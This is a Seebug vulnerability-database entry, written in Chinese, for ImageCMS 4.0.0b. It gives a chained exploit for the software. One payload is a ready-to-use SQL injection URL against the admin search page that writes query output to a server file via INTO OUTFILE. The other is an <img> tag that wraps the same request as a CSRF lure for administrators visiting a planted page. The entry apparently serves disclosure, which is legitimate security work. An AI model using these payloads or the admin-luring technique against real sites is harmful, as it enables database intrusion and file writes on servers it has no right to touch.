Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:78097
HistoryJul 01, 2014 - 12:00 a.m.

ImageCMS 4.0.0b Multiple Vulnerabilities

2014-07-0100:00:00
Root
www.seebug.org
6

0.001 Low

EPSS

Percentile

50.7%

JSON

这是一个组合利用的漏洞
在ImageCMS4.0.0b 中存在 后台SQL注入漏洞:CVE-2012-6290
http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20–%202

然后需要在网站上放置页面诱使网站管理员访问,提交钓鱼页面可以使用图片插入CSRF请求:
<img src=“http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20–%202”>

当管理员访问时就会将查询内容写入/tmp/file.txt文件中。

Related

packetstorm 1
htbridge 1
cvelist 2
securityvulns 2
prion 2
exploitpack 1
seebug 1
cve 2
exploitdb 1
packetstorm
packetstorm
ImageCMS 4.0.0b SQL Injection
2013-01-24 00:00:00
htbridge
htbridge
SQL Injection Vulnerability in ImageCMS
2012-12-05 00:00:00
cvelist
cvelist
CVE-2012-6290
2014-03-11 15:00:00
CVE-2013-7334
2022-10-03 16:14:53
securityvulns
securityvulns
SQL Injection Vulnerability in ImageCMS
2013-01-28 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2013-01-28 00:00:00
prion
prion
Sql injection
2014-03-11 19:37:00
Cross site request forgery (csrf)
2014-03-11 16:17:00
exploitpack
exploitpack
ImageCMS 4.0.0b - Multiple Vulnerabilities
2013-01-25 00:00:00
seebug
seebug
ImageCMS SQL注入漏洞
2014-03-14 00:00:00
cve
cve
CVE-2012-6290
2014-03-11 19:37:00
CVE-2013-7334
2014-03-11 16:17:00
exploitdb
exploitdb
ImageCMS 4.0.0b - Multiple Vulnerabilities
2013-01-25 00:00:00

0.001 Low

EPSS

Percentile

50.7%

JSON
Related for SSV:78097
packetstorm1htbridge1cvelist2securityvulns2prion2exploitpack1seebug1cve2exploitdb1